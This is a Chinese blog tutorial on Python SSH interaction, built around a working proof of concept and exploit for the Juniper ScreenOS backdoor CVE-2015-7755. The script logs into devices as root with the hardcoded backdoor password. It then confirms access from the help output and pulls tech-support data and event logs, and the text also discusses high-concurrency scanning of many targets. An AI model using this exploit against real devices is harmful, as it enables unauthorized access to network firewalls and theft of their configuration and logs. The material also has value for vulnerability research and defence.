Python实现终端交互 —— 以Juniper后门CVE-2015-7755为例(二): SSH篇

  • Title(EN): Shell Interaction in Python #2: SSH
  • Author: dog2

难点

1. 模块选择

对于SSH交互而言,很难以纯socket去实现,因为SSH的认证过程中涉及到各种算法,工作量太大,因此考虑使用已有的SSH模块实现。

(1) paramiko

SSH交互最常用的是第三方模块是paramiko:

  • 文档
  • 源码

下面给出使用paramiko进行ssh登录的一个demo:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import paramiko

def sshLogin(host, username, password, port=22, timeout=5):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

try:
ssh.connect(
host,
username=username,
password=password,
timeout=timeout,
compress=True,
allow_agent=False,
look_for_keys=False,
)
print ssh._transport.authenticated
print ssh._transport.get_banner()
stdin, stdout, stderr = ssh.exec_command('ls', bufsize=1024, timeout=10)
for line in stdout:
print '... ' + line.strip('\n')
ssh.close()
return True

except paramiko.AuthenticationException as err:
return False

except paramiko.SSHException as err:
return False

代码说明:

  • 17行:用于判断是否登录成功
  • 18行:用于输出ssh banner,即登录成功后的欢迎字符串,比如我的vps登录成功后有如下欢迎字符串:
1
2
3
4
5
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.13.0-68-generic x86_64)

* Documentation: https://help.ubuntu.com/
Last login: Wed Dec 30 01:55:57 2015 from 222.222.222.222
root@vultr:~# c

使用如上demo函数尝试登录我的vps,成功登录并打印了ls命令的输出。

但是存在如下问题:

  • 使用如上sshLogin函数登录juniper设备,代码运行到17行时输出为True,说明成功登录了,但当执行到第19行时,会出现如下错误:
1
2
3
4
5
6
7
8
9
  File "/usr/local/lib/python2.7/site-packages/paramiko/client.py", line 405, in exec_command
chan.exec_command(command)
File "/usr/local/lib/python2.7/site-packages/paramiko/channel.py", line 60, in _check
return func(self, *args, **kwds)
File "/usr/local/lib/python2.7/site-packages/paramiko/channel.py", line 229, in exec_command
self._wait_for_event()
File "/usr/local/lib/python2.7/site-packages/paramiko/channel.py", line 1086, in _wait_for_event
raise e
paramiko.ssh_exception.SSHException: Channel closed.

这会导致SSH连接的中断,导致这种异常的原因,可能是juniper这种设备的SSH实现是非标准的,而paramiko对这些非标准SSH支持不佳所致,而使用Unix/Linux自带的SSH客户端程序登陆这些设备就没有这种问题。看来paramiko并不是完美的解决方案,如果仅仅需要验证是否登陆成功,它还是可以满足的。

  • 无论目标是我的vps还是juniper设备,第18行输出的都是空字符串。在google上百度了一下,有人遇到类似问题(#1 #2 #3),也有人做了解答,但大都还是说调用get_banner()函数,并不是解决办法。猜测这可能是paramiko自身的问题,没有深究,如果您知道原因及解决办法,还请指教。
(2) pexpect

从Freebuf文章 "利用Censys批量获取Juniper Netscreen后门" 中了解到pexpect可以用来实现SSH交互,于是简单了解一番。

  • 文档
  • 源码
  • 相关资料:
    • 探索 Pexpect,第 1 部分:剖析 Pexpect
    • 探索 Pexpect,第 2 部分:Pexpect 的实例分析

Freebuf的文章中提到了编写PoC验证设备是否还存在漏洞的思路:

其实由于登录后并不是传统的SSH,而是该防火墙的操作终端,因此pxssh会认为并没有登录成功,而是返回超时异常,此时我们检测其返回的before字段如果有Remote Management Console字样就说明该主机存在后门。

其中提到的pxssh是pexpect中的一个类pexpect.pxssh.pxssh,编写SSH交互程序需要用到它,使用示例参见IBM的文档

尝试了一番,pxssh其实是可以登陆成功的,并没有文章中所说的 "返回异常"。

其实pxssh底层实现还是以进程的方式调用Unix/Linux自带的SSH可执行程序的,而正如上面提到的自带的SSH兼容性很强,因此使用pxssh编写PoC是不错的选择。

但若将程序用于高并发扫描,需要权衡一下并发数与机器性能,因为每扫描一个目标就需要运行一个SSH客户端程序进程。

2. Exp

PoC可以编写了,接下来是Exp,目标还是执行如下2个命令:

  • get tech-support : 它综合了大部分get子命令的结果。
  • get event : 包含了设备日志。

SSH Exp的逻辑与Telnet几乎一样,但是 pexpect.pxssh.pxssh 类中并没有类似于 telnetlib.Telnet 类中的 read_until(expected[, timeout]) 这种函数。

我们可以使用实例函数 pxssh.sendline(cmd) 来发送命令,其中cmd为命令字符串,结尾不必包含,函数会在命令结尾自动添加。

但使用pxssh编写Exp,还是存在如下问题:

  • pxssh默认将上一次命令执行后返回的结果字符串存储在实例变量pxssh.before中,但是在多次获取结果分段时,连续2次获取的消息分段会有重叠。
  • 从源码可以看到pxssh类继承自pexpect.pyt_spawn.spawn类,而spawn类又继承自pexpect.spawnbase.SpawnBase类。在SpawnBase类中,存在类变量buffer,用于接收服务器端发回的消息。因此尝试直接使用pxssh.buffer变量来代替before变量,并在每一次发送新的命令之前,将pxssh.buffer清空,但是又出现了结果不完整的问题。
  • 可以尝试使用IBM的文章中 "例 3:ssh 的使用" 提到的,直接使用spawn类来实现,但是该类较为底层,需要我们自己处理SSH的登录及交互逻辑,且其中expect函数的pattern参数需为pexpect.expect中定义的类实例,而不是直接传入字符串或正则表达式,使用起来较为繁琐。

最终找到了合适的类函数 pexpect.pty_spawn.read_nonblocking(size=1, timeout=-1) ,它读取服务器端发来的数据,直到数据字节数达到size,或者达到超时时间timeout。但终止字符串就还需由我们自己判断。

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import pexpect

from pexpect import pxssh


def poc(host, port=22, loginTimeout=10,
readTimeout=2, successFlag='ping other host', doExp=True):

def exp(cmd, maxTo=3):

def readUntilTimeout():
errFlag = False
data = ''
while not errFlag:
try:
data += ssh.read_nonblocking(
size=65536,
timeout=readTimeout
)
except pexpect.exceptions.ExceptionPexpect as err:
errFlag = True
return data

readUntilTimeout() # skip verbose strings
toNum = 0
ssh.send(cmd + '\n'*20)
data = readUntilTimeout()
ret = data
while ('->' not in data[-10:]) and (toNum < maxTo):
data = readUntilTimeout()
ret += data
if not data:
toNum += 1
continue
ssh.send('\n'*20)
return ret

ssh = pxssh.pxssh(timeout=readTimeout)
ssh.login(
server=host,
port=port,
username='root',
password="<<< %s(un='%s') = %u",
auto_prompt_reset=False,
login_timeout=loginTimeout,
)
banner = ssh.before
ssh.sendline('?')
help = ssh.read_nonblocking(size=65536, timeout=readTimeout)
success = successFlag in help.lower()
techsupport = ''
event = ''
if success and doExp:
techsupport = exp(cmd='get tech-support')
event = exp(cmd='get event')
return success, banner, help, techsupport, event

代码说明:

  • 26行:连续发送多个,一次性将服务器端的多个结果分段获取到客户端的接收缓存中,这样可以减少交互,提高程序效率。
  • 29行:判断每次读取的缓存区中的数据的后10个字符串中是否存在 -> 字符,来识别最后一个结果分段。

代码逻辑与Telnet程序类似。